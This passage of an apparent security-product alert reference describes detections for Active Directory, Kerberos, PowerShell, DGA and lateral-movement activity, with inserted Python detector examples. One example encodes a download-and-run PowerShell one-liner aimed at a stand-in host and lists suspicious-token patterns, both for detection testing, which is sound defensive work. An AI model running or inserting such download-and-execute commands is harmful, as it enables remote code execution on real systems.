specific destination is sparse, Cortex XDR Analytics could raise a false alert.

Possible DCShadow attempt
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data Cortex XDR can raise this alert from the following combination of data
sources: Palo Alto Networks Firewall Logs, XDR Agent, Corelight, or
Third-Party Firewalls

Required Detection Modules No module required

ATT&CK Tactic • Credential Access (TA0006)
• Defense Evasion (TA0005)

ATT&CK Technique • OS Credential Dumping (T1003)
• Rogue Domain Controller (T1207)

Severity High

Description
Attackers may register a compromised host as a new DC to get other DCs to replicate data to it, and then
push their malicious AD changes to all DCs.

Attacker's Goals
Retrieve Active Directory data, to later be able to push out malicious Active Directory changes.

Investigative Actions
Check whether the destination is a new domain controller or a host that syncs with ADFS or Azure AD.

Possible DCSync Attempt
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data Cortex XDR can raise this alert from the following combination of data
sources: Palo Alto Networks Firewall Logs, XDR Agent, Corelight, or
Third-Party Firewalls

Required Detection Modules No module required

ATT&CK Tactic • Credential Access (TA0006)
• Defense Evasion (TA0005)

ATT&CK Technique • OS Credential Dumping (T1003)
• Rogue Domain Controller (T1207)

Severity Medium

Description
Attackers may pose a compromised host as a DC so that a legitimate DC replicates directory data to it (DCSync).

Attacker's Goals
An attacker is trying to retrieve Active Directory data.

Investigative Actions
Check whether one of the machines is a new domain controller.

Possible Kerberoasting without SPNs
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data Cortex XDR can raise this alert from the following combination of data
sources: Palo Alto Networks Firewall Logs or XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Credential Access (TA0006)

ATT&CK Technique Steal or Forge Kerberos Tickets: Kerberoasting (T1558.003)

Severity Low

Description
A user explicitly requested weak, deprecated encryption in a Kerberos TGS request. This yields easy-to-crack
ticket hashes and is typically a sign of a Kerberoasting attack. The requested service was specified by using
a suspicious SPN type, which Kerberoasting tools often use to request a ticket by SAN instead of by SPN.

Attacker's Goals
Crack service account credentials by obtaining an easy-to-crack Kerberos ticket.

Investigative Actions
Check who used the host at the time of the alert, to rule out a benign service or tool requesting weak
Kerberos encryption.
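
The two conditions this alert combines (a weak encryption type and a service named by something other than a class/host SPN) can be checked directly on TGS request events. The following is an added example, not code from the Cortex XDR product or this reference; the events are constructed and modelled loosely on Windows event 4769 fields, the reading of the page's "SAN" as a bare account name without a slash is an assumption, and the etype table lists DES and RC4 as the weak types.

```python
# Constructed Kerberos TGS request events, modelled loosely on the fields of Windows event 4769.
# These are sample records for this example, not Cortex XDR data.
SAMPLE_TGS_EVENTS = [
    {"host": "WS01", "user": "alice", "service_name": "HTTP/web01.corp.example", "etype": 0x12},
    {"host": "WS01", "user": "alice", "service_name": "MSSQLSvc/db01.corp.example:1433", "etype": 0x17},
    {"host": "WS07", "user": "bob", "service_name": "svc_backup", "etype": 0x17},
    {"host": "WS07", "user": "bob", "service_name": "svc_sql", "etype": 0x17},
    {"host": "WS07", "user": "bob", "service_name": "krbtgt", "etype": 0x12},
]

# Kerberos encryption types considered weak: DES (deprecated) and RC4-HMAC, whose ticket
# hashes are the cheap ones to crack offline. AES types (0x11, 0x12) are deliberately absent.
WEAK_ETYPES = {0x01: "DES-CBC-CRC", 0x03: "DES-CBC-MD5", 0x17: "RC4-HMAC", 0x18: "RC4-HMAC-EXP"}


def is_weak_etype(etype):
    return etype in WEAK_ETYPES


def is_spn_format(service_name):
    """A service principal name has the form class/host[:port][/name].
    A bare account name (this example's reading of 'request by SAN') has no slash."""
    return "/" in service_name


def classify_tgs_request(event):
    """Three outcomes: the alert's condition, a weaker RC4/DES-only indicator, or benign."""
    weak = is_weak_etype(event["etype"])
    if weak and not is_spn_format(event["service_name"]):
        return "kerberoast_without_spn"  # weak etype AND non-SPN service name: what this alert describes
    if weak:
        return "weak_etype"  # weak etype for a real SPN: classic Kerberoasting signal, lower confidence
    return "benign"


def find_kerberoast_candidates(events):
    """Return (host, user, service_name, etype name) for events matching the alert's condition."""
    return [
        (e["host"], e["user"], e["service_name"], WEAK_ETYPES[e["etype"]])
        for e in events
        if classify_tgs_request(e) == "kerberoast_without_spn"
    ]


if __name__ == "__main__":
    for hit in find_kerberoast_candidates(SAMPLE_TGS_EVENTS):
        print("candidate:", hit)
```

The "weak_etype" outcome is kept separate on purpose: an RC4 ticket for a real SPN is a common Kerberoasting sign but also occurs for legacy services, so it is the lower-severity case; the investigative action above (who used the host, and whether a benign tool requests weak encryption) applies to both.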

Possible Search For Password Files
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Hour

Required Data XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Credential Access (TA0006)

ATT&CK Technique Unsecured Credentials: Credentials In Files (T1552.001)

Severity Medium

Description
Attackers often search for files that have passwords in them.

Attacker's Goals
Gain user-account credentials.

Investigative Actions
Check whether the executing process is benign, and if this was a desired behavior as part of its normal
execution flow.

Possible compromised machine account
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data Cortex XDR can raise this alert from the following combination of data
sources: Palo Alto Networks Firewall Logs or XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Execution (TA0002)

ATT&CK Technique User Execution (T1204)

Severity Medium

Description
A Kerberos TGT for a machine account was used from a host whose hostname does not match the account.

Attacker's Goals
Obtain a special user's Kerberos ticket in order to move laterally.

Investigative Actions
• Check the source host for possible credential dumping.
• Check the delegated account credentials and if it has high privileges.
• Check the ticket destination to verify whether it is a sensitive asset.

PowerShell Initiates a Network Connection to GitHub
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data XDR Agent
For increased accuracy, you can also add the following optional data
source: Palo Alto Networks Firewall Logs

Required Detection Modules No module required

ATT&CK Tactic Execution (TA0002)

ATT&CK Technique Command and Scripting Interpreter: PowerShell (T1059.001)

Severity Low

Description
PowerShell initiates a network connection to GitHub with an uncommon command line. This may have
legitimate uses, but this technique is frequently used by attackers to serve malicious payloads.

Attacker's Goals
Download a second stage payload for execution.

Investigative Actions
• Check if the initiator process is malicious.
• Check for additional file/network operations by the same PowerShell instance.

PowerShell runs suspicious base64-encoded commands
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 6 Hours

Required Data XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Execution (TA0002)

ATT&CK Technique Command and Scripting Interpreter: PowerShell (T1059.001)

Severity Medium

Description
Running PowerShell with a base64-encoded payload in the command line is often used by attackers to
evade detection.

Attacker's Goals
Run general code to perform actions or download other malicious programs.

Investigative Actions
• Check if the initiator process is malicious.
• Check for other operations by the PowerShell instance.
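
When triaging this alert, the first step is to recover the plaintext behind the encoded argument, because the base64 is what hides the intent from command-line review. The following is an added example, not code from the Cortex XDR product or this reference: it decodes the `-EncodedCommand` payload (UTF-16LE text, base64, as PowerShell expects it, accepting the abbreviated forms such as `-e` and `-enc`), tolerates stripped padding and rejects payloads that are not valid, and then reports which of a constructed indicator list appear in the decoded script. The indicator list is an assumption for this example and is triage input, not proof of malice.

```python
import base64

# Indicators commonly seen in decoded malicious PowerShell. Constructed list for this example;
# tune it to your environment, and treat hits as triage input, not as proof.
SUSPICIOUS_TOKENS = ("invoke-expression", "iex ", "downloadstring", "downloadfile",
                     "net.webclient", "frombase64string", "-windowstyle hidden", "bypass")


def _is_encoded_flag(token):
    """powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...)."""
    if len(token) < 2 or token[0] not in "-/":
        return False
    return "encodedcommand".startswith(token[1:].lower())


def encode_command(script):
    """Encode a script the way PowerShell expects it: UTF-16LE text, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the decoded script from a PowerShell command line, or None when there is no
    -EncodedCommand argument or its payload is not valid base64 / UTF-16LE."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if not _is_encoded_flag(tok):
            continue
        payload = tokens[i + 1].strip("\"'")
        payload += "=" * (-len(payload) % 4)  # tolerate stripped base64 padding
        try:
            return base64.b64decode(payload, validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
            return None
    return None


def analyze_powershell_cmdline(cmdline):
    """Decode the payload (if any) and report which suspicious indicators it contains."""
    script = decode_encoded_command(cmdline)
    if script is None:
        return {"encoded": False, "script": None, "indicators": []}
    lowered = script.lower()
    return {"encoded": True, "script": script,
            "indicators": [tok for tok in SUSPICIOUS_TOKENS if tok in lowered]}


if __name__ == "__main__":
    # Constructed sample: a download-and-run one-liner, encoded the way an attacker would pass it.
    sample = "(New-Object Net.WebClient).DownloadString('http://example.invalid/stage2') | Invoke-Expression"
    print(analyze_powershell_cmdline("powershell.exe -NoP -W Hidden -enc " + encode_command(sample)))
```

A command line whose payload fails to decode is itself worth a look: a process that is not PowerShell, or a truncated argument, both produce `None` here, and the investigative actions above (initiator process, other operations by the same instance) still apply.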

RDP Connection to localhost
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Hour

Required Data XDR Agent
For increased accuracy, you can also add the following optional data
source: Palo Alto Networks Firewall Logs

Required Detection Modules No module required

ATT&CK Tactic Lateral Movement (TA0008)

ATT&CK Technique Remote Services: Remote Desktop Protocol (T1021.001)

Severity Medium

Description
RDP connection to localhost can be used for privilege escalation by leveraging Windows Accessibility
Features.

Attacker's Goals
An attacker may initiate RDP tunneling for a more convenient and stable interface.

Investigative Actions
• Identify the process/user performing RDP and check that it is authorized.
• Check whether the initiating process also connects to an external host.

Random-Looking Domain Names
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period 1 Day

Deduplication Period 1 Day

Required Data Palo Alto Networks Firewall Logs
For increased accuracy, you can also add the following optional data
source: XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Command and Control (TA0011)

ATT&CK Technique Dynamic Resolution: Domain Generation Algorithms (T1568.002)

Severity Medium

Description
The endpoint performed DNS lookups to an excessively large number of apparently random root domain
names. This alert might be symptomatic of malware that is trying to connect to its command and control
(C2) servers.
The attacker's C2 server runs on one or more domains that can eventually be identified and blacklisted. To
avoid this, malware will sometimes use Domain Generation Algorithms (DGA) that produce many unique,
random-looking domain names every day. Because only a few of these domains are ever registered, the
installed malware must blindly try to access each generated domain name in an effort to locate an active
one, which may also trigger the Failed DNS alert.

Attacker's Goals
Communicate with malware running on your network to control its activities, performing software updates,
or to take inventory of infected machines.

Investigative Actions
• Make sure your DNS servers are not misconfigured and are responsive. This detector assumes that most
DNS lookups succeed, and will only raise an alert when it sees many failed lookups. Misconfigured or
unresponsive DNS servers can result in a false positive.
• Make sure you do not have external domains configured as internal domains. This can result in clients
attempting to (for example) resolve google.com.local first, before resolving google.com. This can result in
a false positive for this alert.
• Ensure that the endpoint is configured properly for your DNS servers. Make sure it is configured to use
the correct DNS IP address, and that the IP address is not for a firewalled DNS server. Misconfigured
DNS clients can result in many failed lookups, which will result in a false positive for this alert.
• Make sure the endpoint is not a DNS, Proxy, NAT or VPN gateway server. If these have been
misdetected by Cortex XDR Analytics, then their ordinary operations can trigger this alert.
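
The description and the investigative actions above together define a detector: count, per endpoint, failed lookups of distinct random-looking root domains, and discount the known false-positive sources (internal search suffixes such as `.local`). The following is an added example, not the Cortex XDR detector or code from this reference; the log format, the `.local` suffix list, the randomness heuristic (character entropy plus vowel ratio and consonant runs) and the threshold of five domains are all assumptions constructed for the example, and the naive "last two labels" root-domain rule stands in for a public suffix list.

```python
import math
import re
from collections import defaultdict

# Constructed DNS query log lines for this example (a simplified key=value layout, not a real
# firewall or Cortex XDR format). The random-looking names were made up for the sample.
SAMPLE_DNS_LOG = """\
2021-07-07T10:00:01Z src=10.0.0.5 query=xk3jq9vz2m.com rcode=NXDOMAIN
2021-07-07T10:00:02Z src=10.0.0.5 query=bhq7ztkwpl.net rcode=NXDOMAIN
2021-07-07T10:00:03Z src=10.0.0.5 query=wqmjvkxzt.org rcode=NXDOMAIN
2021-07-07T10:00:04Z src=10.0.0.5 query=7ha3kd9pqw.com rcode=NXDOMAIN
2021-07-07T10:00:05Z src=10.0.0.5 query=zp4xvqn8tr.info rcode=NXDOMAIN
2021-07-07T10:00:06Z src=10.0.0.5 query=qtxzkvbnmw.biz rcode=NXDOMAIN
2021-07-07T10:00:07Z src=10.0.0.5 query=www.google.com rcode=NOERROR
2021-07-07T10:01:00Z src=10.0.0.7 query=mail.google.com rcode=NOERROR
2021-07-07T10:01:01Z src=10.0.0.7 query=k9zxq2wvtm.com rcode=NXDOMAIN
2021-07-07T10:01:02Z src=10.0.0.7 query=update.microsoft.com rcode=NOERROR
2021-07-07T10:02:00Z src=10.0.0.9 query=google.com.local rcode=NXDOMAIN
2021-07-07T10:02:01Z src=10.0.0.9 query=github.com.local rcode=NXDOMAIN
2021-07-07T10:02:02Z src=10.0.0.9 query=salesforce.com.local rcode=NXDOMAIN
2021-07-07T10:02:03Z src=10.0.0.9 query=akamaihd.net.local rcode=NXDOMAIN
2021-07-07T10:02:04Z src=10.0.0.9 query=paloaltonetworks.com.local rcode=NXDOMAIN
"""

LINE_RE = re.compile(r"^(?P<ts>\S+) src=(?P<src>\S+) query=(?P<query>\S+) rcode=(?P<rcode>\S+)$")
INTERNAL_SUFFIXES = (".local",)  # assumption: the organization's internal DNS search suffixes
VOWELS = set("aeiou")


def parse_dns_line(line):
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def root_domain(fqdn):
    """Naive registrable domain: last two labels. Production code would use the public suffix list."""
    labels = fqdn.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def shannon_entropy(text):
    if not text:
        return 0.0
    n = len(text)
    counts = {ch: text.count(ch) for ch in set(text)}
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def looks_random(label):
    """Heuristic DGA test: high character entropy combined with few vowels or a long consonant run.
    Thresholds are assumptions chosen for this example."""
    alnum = re.sub(r"[^a-z0-9]", "", label.lower())
    if len(alnum) < 7:
        return False
    vowel_ratio = sum(ch in VOWELS for ch in alnum) / len(alnum)
    longest_run = max((len(r) for r in re.findall(r"[^aeiou]+", alnum)), default=0)
    return shannon_entropy(alnum) >= 3.0 and (vowel_ratio < 0.25 or longest_run >= 5)


def find_dga_candidates(log_text, threshold=5):
    """Per source, collect failed lookups of random-looking root domains and flag sources that reach
    the threshold of distinct domains. Lookups under internal suffixes are skipped: they reflect a
    DNS search-list misconfiguration (the false positive described above), not a DGA."""
    failed = defaultdict(set)
    for line in log_text.splitlines():
        rec = parse_dns_line(line)
        if rec is None or rec["rcode"] != "NXDOMAIN":
            continue
        fqdn = rec["query"].lower()
        if fqdn.endswith(INTERNAL_SUFFIXES):
            continue
        root = root_domain(fqdn)
        if looks_random(root.split(".")[0]):
            failed[rec["src"]].add(root)
    return {src: sorted(doms) for src, doms in failed.items() if len(doms) >= threshold}


if __name__ == "__main__":
    for src, domains in find_dga_candidates(SAMPLE_DNS_LOG).items():
        print(src, "->", domains)
```

In the sample, 10.0.0.5 is flagged on six distinct failures, 10.0.0.7 is not (one random-looking failure among normal traffic), and 10.0.0.9 is not, even though every one of its lookups failed, because those failures are the `.local` search-suffix pattern the investigative actions call out; a real deployment would also exclude the DNS, proxy, NAT and VPN gateways named in the last bullet.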

Rare SSH Session
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Hour

Required Data XDR Agent
For increased accuracy, you can also add the following optional data
source: Palo Alto Networks Firewall Logs

Required Detection Modules No module required

ATT&CK Tactic Lateral Movement (TA0008)

ATT&CK Technique Remote Services (T1021)

Severity Low

Description
Secure Shell (SSH) provides a secure means of remote administration. Attackers can use valid SSH
credentials and keys to remotely connect to endpoints running the SSH service.

Attacker's Goals
Secure Shell (SSH) provides a secure means of remote administration. Attackers can use valid SSH
credentials and keys to remotely connect to endpoints running the SSH service.

Investigative Actions
• Verify that the process is allowed in the organization.
• Check if the user should access the destination and whether the session was successful or not.

Rare Unsigned Process Spawned by Office Process Under Suspicious Directory
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Execution (TA0002)

ATT&CK Technique User Execution (T1204)

Severity Low

Description
Microsoft Office executed an unsigned process in a suspicious directory. This behavior is common with
malicious macros.

Attacker's Goals
Attackers execute commands after gaining a foothold through phishing or by exploiting a vulnerability in an Office application.

Investigative Actions
• Investigate the executed process.
• Investigate the document/email that initiated it.

Rare WinRM Session
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data XDR Agent
For increased accuracy, you can also add the following optional data
source: Palo Alto Networks Firewall Logs

Required Detection Modules No module required

ATT&CK Tactic Lateral Movement (TA0008)

ATT&CK Technique Remote Services: Windows Remote Management (T1021.006)

Severity Informational

Description
Windows Remote Management (WinRM) enables users to interact with remote systems in different ways,
including running executables on the remote system. WinRM sessions can be established using WinRM/
WinRS commands or programs such as PowerShell. Attackers can use WinRM to execute code and move
laterally within a compromised network.

Attacker's Goals
Windows Remote Management (WinRM) enables users to interact with remote systems in different ways,
including running executables on the remote endpoint. WinRM sessions can be established using winrm/
winrs commands or programs such as PowerShell. Attackers can use WinRM to execute code and move
laterally within a compromised network.

Investigative Actions
Investigate the endpoints participating in the session.

Rare process execution by user
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 30 Days

Required Data XDR Agent

Required Detection Modules Identity Analytics

ATT&CK Tactic Execution (TA0002)

ATT&CK Technique User Execution (T1204)

Severity Informational

Description
An unusual process was executed by a user. This may be indicative of a compromised account.

Attacker's Goals
Unusual processes may be executed for various purposes including exfiltration, lateral movement, etc.

Investigative Actions
Investigate the process that was executed to determine if it was used for legitimate purposes or malicious
activity.

Rare process execution in organization
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 30 Days

Required Data XDR Agent

Required Detection Modules Identity Analytics

ATT&CK Tactic Execution (TA0002)

ATT&CK Technique User Execution (T1204)

Severity Informational

Description
An unusual process was executed in the organization. This may be indicative of a compromised account.

Attacker's Goals
Unusual processes may be executed for various purposes including exfiltration, lateral movement, etc.

Investigative Actions
Investigate the process that was executed to determine if it was used for legitimate purposes or malicious
activity.

Recurring access to rare IP
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 21 Days

Required Data Cortex XDR can raise this alert from the following combinations of data
sources:
• Palo Alto Networks Firewall Logs
• XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Command and Control (TA0011)

ATT&CK Technique Non-Application Layer Protocol (T1095)

Severity Low

Description
The endpoint is periodically accessing an external fixed-IP address that its peers rarely use. Access to this
external IP address has occurred repeatedly over many days. This connection pattern is consistent with
malware connecting to its command and control server for updates and operating instructions.

Attacker's Goals
Communicate with malicious code running on your network enabling further access to the endpoint and
network, performing software updates on the endpoint, or for taking inventory of infected machines.

Investigative Actions
• Identify if the IP address belongs to a reputable organization or an asset used in a public cloud.
• Identify if the source of the traffic is malware. If the source of the traffic is a malicious file, Cortex XDR
Analytics also raises a malware alert for the file on the endpoint. Malware may contact legitimate IP
addresses, therefore check for unusual apps used, or unusual ports or volumes accessed.
• View all related traffic generated by the suspicious process to understand the purpose.
• Look for other endpoints on your network that are also contacting the suspicious IP address.
• Examine file-system operations performed by the process to look for potential artifacts on infected
endpoints.

Recurring access to rare domain categorized as malicious
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data Palo Alto Networks Firewall Logs
For increased accuracy, you can also add the following optional data
source: XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Command and Control (TA0011)

ATT&CK Technique Application Layer Protocol (T1071)

Severity Medium

Description
The endpoint is periodically connecting to an external domain (categorized as malicious) that it and its
peers rarely use. Access to this domain has occurred repeatedly over multiple days. This connection pattern
is consistent with malware connecting to its command and control server for updates and operating
instructions.

Attacker's Goals
Communicate with malware running on your network to control malware activities, perform software
updates on the malware, or to take inventory of infected machines.

Investigative Actions
• Identify the process/user contacting the remote domain and determine whether the traffic is malicious.
• Look for other endpoints on your network that are also periodically contacting the suspicious domain.

Recurring rare domain access from an unsigned process
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 14 Days

Required Data Cortex XDR can raise this alert from the following combinations of data
sources:
• Palo Alto Networks Firewall Logs
• XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Command and Control (TA0011)

ATT&CK Technique Application Layer Protocol (T1071)

Severity Medium

Description
An unsigned process is periodically connecting to an external domain that it and its peers rarely use. Access
to this domain has occurred repeatedly over multiple days. This connection pattern is consistent with
malware connecting to its command and control server for updates and operating instructions.

Attacker's Goals
Communicate with malware running on your network to control malware activities, perform software
updates on the malware, or to take inventory of infected machines.

Investigative Actions
• Identify the process contacting the remote domain and determine whether the traffic is malicious.
• Look for other endpoints on your network that are also periodically contacting the suspicious domain.

Recurring rare domain access to dynamic DNS domain
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 14 Days

Required Data Palo Alto Networks Firewall Logs
For increased accuracy, you can also add the following optional data
source: XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Command and Control (TA0011)

ATT&CK Technique Application Layer Protocol (T1071)

Severity Medium

Description
The endpoint is periodically connecting to an external domain that it and its peers rarely use. Access to this
domain has occurred repeatedly over multiple days. This connection pattern is consistent with malware
connecting to its command and control server for updates and operating instructions.

Attacker's Goals
Communicate with malware running on your network to control malware activities, perform software
updates on the malware, or to take inventory of infected machines.

Investigative Actions
• Identify the process/user contacting the remote domain and determine whether the traffic is malicious.
• Look for other endpoints on your network that are also periodically contacting the suspicious domain.

Remote account enumeration
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period 1 Hour

Deduplication Period 1 Day

Required Data XDR Agent

Required Detection Modules Identity Analytics

ATT&CK Tactic • Discovery (TA0007)
• Credential Access (TA0006)

ATT&CK Technique • Account Discovery (T1087)
• Brute Force (T1110)

Severity Medium

Description
Multiple non-existing accounts failed to remotely log in to a host in a short period of time. This may indicate
an attacker is trying to remotely enumerate accounts.

Attacker's Goals
Discover valid accounts to gain credentials.

Investigative Actions
Check if the login attempts were part of a legitimate misunderstanding of the system or part of an attack.

Remote command execution via wmic.exe
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Execution (TA0002)

ATT&CK Technique Windows Management Instrumentation (T1047)

Severity Medium

Description
Remote command execution using the Windows Management Instrumentation command-line tool.

Attacker's Goals
The attacker is expanding their reach into your network by executing commands on a remote endpoint.

Investigative Actions
• Examine Alert Details > Overview to identify the source endpoint, process running the command
execution, process owner, and execution destination.

Remote service command execution from an uncommon source
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data XDR Agent

Required Detection Modules No module required

ATT&CK Tactic • Lateral Movement (TA0008)
• Execution (TA0002)

ATT&CK Technique • Remote Services (T1021)
• System Services: Service Execution (T1569.002)

Severity High

Description
A remotely triggered service initiated a command execution by a host that rarely triggers services to other
remote hosts.

Attacker's Goals
Perform lateral movement to new hosts to expand the foothold within a network.

Investigative Actions
• Investigate the processes being spawned on the host for malicious activities.
• Correlate the RPC call from the source host and understand which software initiated it.

Remote service start from an uncommon source
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data XDR Agent

Required Detection Modules No module required

ATT&CK Tactic • Lateral Movement (TA0008)
• Execution (TA0002)

ATT&CK Technique • Remote Services (T1021)
• System Services: Service Execution (T1569.002)

Severity Low

Description
A service was started remotely by a host that rarely starts services on other remote hosts.

Attacker's Goals
Perform lateral movement to new hosts to expand the foothold within a network.

Investigative Actions
• Investigate the service being spawned on the host for malicious activities.
• Correlate the RPC call from the source host and understand which software initiated it.

Reverse SSH tunnel to external domain/ip
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 12 Hours

Required Data XDR Agent
For increased accuracy, you can also add the following optional data
source: Palo Alto Networks Firewall Logs

Required Detection Modules No module required

ATT&CK Tactic Command and Control (TA0011)

ATT&CK Technique Protocol Tunneling (T1572)

Severity Medium

Description
A reverse SSH tunnel might have been created.

Attacker's Goals
Attackers may use SSH to create an encrypted tunnel to allow an attacker to covertly connect to an internal
host.

Investigative Actions
• Review the external IP/domain.
• Investigate the causality of the process.

SMB Traffic from Non-Standard Process
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Hour

Required Data XDR Agent
For increased accuracy, you can also add the following optional data
source: Palo Alto Networks Firewall Logs

Required Detection Modules No module required

ATT&CK Tactic Discovery (TA0007)

ATT&CK Technique Network Service Scanning (T1046)

Severity Medium

Description
SMB traffic is usually performed by a standard set of privileged processes through designated ports. The
endpoint had a non-standard process communicating over ports normally used by SMB. An attacker might
be moving laterally by using tools that implement a custom version of the SMB protocol.

Attacker's Goals
This might be symptomatic of an attacker's lateral movements. The attacker could be:
• using a custom protocol implementation that offers malicious functionality
• using a protocol other than SMB or Kerberos, but that still uses the SMB or Kerberos well-known ports.
Either way, the attacker's goal is to gain access to another endpoint on your network. The attacker could
also be surveying your network by performing service scans over the well-known SMB or Kerberos ports.

Investigative Actions
• Make sure the process is not a scanner that implements its own version of the protocol, and that the scanner
use is for sanctioned purposes. For example, nmap enumerating SMB.
• Make sure the process is not a sanctioned security product that creates standalone binaries for its use.
For example, Illusive Network honeypots.
• Investigate the process to see if the high-level language used to implement the application is the source
of the alert. Some high-level programming languages provide their own protocol implementations. For
example, Java uses its own Kerberos implementation.
• Examine the endpoint to see if it is infected with malware. If the parent-child chain of initiating
processes has been infiltrated with a malicious replacement, then that replacement could be known
malware.

SSO authentication by a machine account
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data Cortex XDR can raise this alert from the following combination of data
sources: AzureAD, Okta, or PingOne

Required Detection Modules Identity Analytics

ATT&CK Tactic Initial Access (TA0001)

ATT&CK Technique Valid Accounts: Domain Accounts (T1078.002)

Severity Low

Description
A machine account attempted to authenticate via SSO.

Attacker's Goals
Use an account that has access to resources to move laterally in the network and access privileged
resources.

Investigative Actions
• See whether the service authentication was successful.
• Check whether the account has done any administrative actions it should not usually do.
• Look for more logins and authentications by the account throughout the network.

SSO authentication by a service account
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data Cortex XDR can raise this alert from the following combination of data
sources: AzureAD, Okta, or PingOne

Required Detection Modules Identity Analytics

ATT&CK Tactic Initial Access (TA0001)

ATT&CK Technique Valid Accounts: Domain Accounts (T1078.002)

Severity Low

Description
A service account attempted to authenticate via SSO.

Attacker's Goals
Use an account that has access to resources to move laterally in the network and access privileged
resources.

Investigative Actions
• See whether the service authentication was successful.
• Check whether the account has done any administrative actions it should not usually do.
• Look for more logins and authentications by the account throughout the network.

SSO with abnormal operating system
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data Cortex XDR can raise this alert from the following combination of data
sources: AzureAD or Okta
For increased accuracy, you can also add the following optional data
source: XDR Agent

Required Detection Modules Identity Analytics

ATT&CK Tactic Initial Access (TA0001)

ATT&CK Technique Valid Accounts: Domain Accounts (T1078.002)

Severity Low

Description
A user attempted to authenticate via SSO with an abnormal operating system.

Attacker's Goals
Use a legitimate user and authenticate via an SSO service to gain access to the network.

Investigative Actions
• See whether the service authentication was successful.
• Confirm that the activity is benign (e.g. the user has really moved to a new operating system).
• Follow actions and suspicious activities regarding the user.

SSO with new operating system
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data Cortex XDR can raise this alert from the following combination of data
sources: AzureAD or Okta

Required Detection Modules Identity Analytics

ATT&CK Tactic Initial Access (TA0001)

ATT&CK Technique Valid Accounts: Domain Accounts (T1078.002)

Severity Informational

Description
A user attempted to authenticate via SSO with a new operating system.

Attacker's Goals
Use a legitimate user and authenticate via an SSO service to gain access to the network.

Investigative Actions
• See whether the service authentication was successful.
• Confirm that the activity is benign (e.g. the user has really moved to a new operating system).
• Follow actions and suspicious activities regarding the user.

Scrcons.exe Rare Child Process
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Hour

Required Data XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Execution (TA0002)

ATT&CK Technique Windows Management Instrumentation (T1047)

Severity Low

Description
The Windows Management Instrumentation (WMI) standard event consumer scrcons.exe executed a rare
VBScript or PowerShell script. Executing a rare script can be an indication of local or remote code execution
abuse by an attacker.

Attacker's Goals
The attacker is trying to gain persistence via WMI script registration.

Investigative Actions
Review registered WMI ActiveScriptEventConsumer.

Script Connecting to Rare External Host
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 6 Hours

Required Data XDR Agent
For increased accuracy, you can also add the following optional data
source: Palo Alto Networks Firewall Logs

Required Detection Modules No module required

ATT&CK Tactic Execution (TA0002)

ATT&CK Technique Command and Scripting Interpreter (T1059)

Severity Medium

Description
Scripts connecting to external IP addresses may be sanctioned IT scripts. However, when those external IP
